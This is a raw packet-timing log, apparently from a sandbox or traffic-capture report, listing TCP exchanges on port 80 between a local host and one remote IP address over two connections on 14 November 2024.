                                                                                                                                                                                                            Nov 14, 2024 12:19:57.658185959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.658196926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.658242941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735270977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735304117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735322952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735335112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735346079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735356092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735363007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735383034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735446930 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735651970 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.735706091 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737107992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737128019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737138033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737179041 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737180948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737190008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737231970 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737395048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737406969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737417936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737427950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737438917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737447023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737449884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737473965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737524986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737586975 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737613916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737623930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737665892 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737715960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737726927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737739086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737771034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737848997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737859011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737869024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737895966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737934113 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.737987041 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738003969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738014936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738051891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738133907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738184929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738195896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738208055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738245964 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738272905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738284111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738323927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738471985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738482952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738523006 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738545895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738557100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738568068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738578081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738591909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738593102 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738600969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738620043 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738697052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738912106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738922119 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738933086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.738977909 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739064932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739074945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739085913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739114046 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739146948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739149094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739161015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.739203930 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.769576073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.769589901 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.769601107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.769709110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.772063971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.772075891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.772088051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.772123098 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.772219896 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.776917934 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.776930094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.776941061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.777024984 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.777945995 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778009892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778022051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778033018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778106928 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778116941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778126001 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778130054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778141975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778249025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778249025 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778263092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778273106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778343916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778412104 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778424978 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778436899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778446913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778507948 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778537035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778583050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778636932 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778645992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778695107 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778706074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778719902 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778760910 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778824091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778835058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778846025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778872967 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.778990030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779000998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779011965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779028893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779046059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779083014 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779113054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779124022 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779135942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779158115 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779177904 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779279947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779330015 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779372931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779385090 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779396057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779436111 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779515982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779529095 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779540062 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779550076 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779566050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779593945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779597044 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779607058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779618979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779630899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779639959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779647112 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779681921 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779714108 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.779988050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780000925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780014038 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780042887 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780565977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780577898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.780622005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854130983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854150057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854167938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854330063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854336977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854348898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854361057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854372025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854382992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.854538918 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856004953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856018066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856034994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856172085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856177092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856190920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856204033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856220007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856230974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856241941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856276035 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856309891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856372118 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856441021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856462002 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856520891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856533051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856547117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856559992 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856564999 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856573105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856652021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856671095 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856718063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856728077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856775999 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856790066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856801033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856812954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856822968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856833935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856856108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.856889963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857150078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857161999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857178926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857208967 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857549906 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857562065 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857573986 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857585907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857603073 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857614040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857645988 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857718945 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857744932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857757092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857768059 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857779026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857789993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857795954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857801914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857814074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857824087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857835054 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857840061 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.857882977 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.858254910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.858266115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.858277082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.858309031 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.893373966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.893388033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.893399000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.893506050 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895467997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895482063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895490885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895571947 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895752907 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895765066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895775080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895787954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895840883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895870924 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895881891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895893097 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.895947933 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901683092 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901695967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901707888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901797056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901796103 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901809931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901823044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901865005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901957035 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901968956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.901979923 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902002096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902014971 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902026892 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902041912 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902048111 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902060032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902071953 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902107954 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902178049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902189970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902199984 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902206898 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902209997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902218103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902226925 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902255058 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902291059 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902479887 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902493954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902507067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902555943 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902559996 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.902574062 CET8049957147.45.47.81192.168.2.10
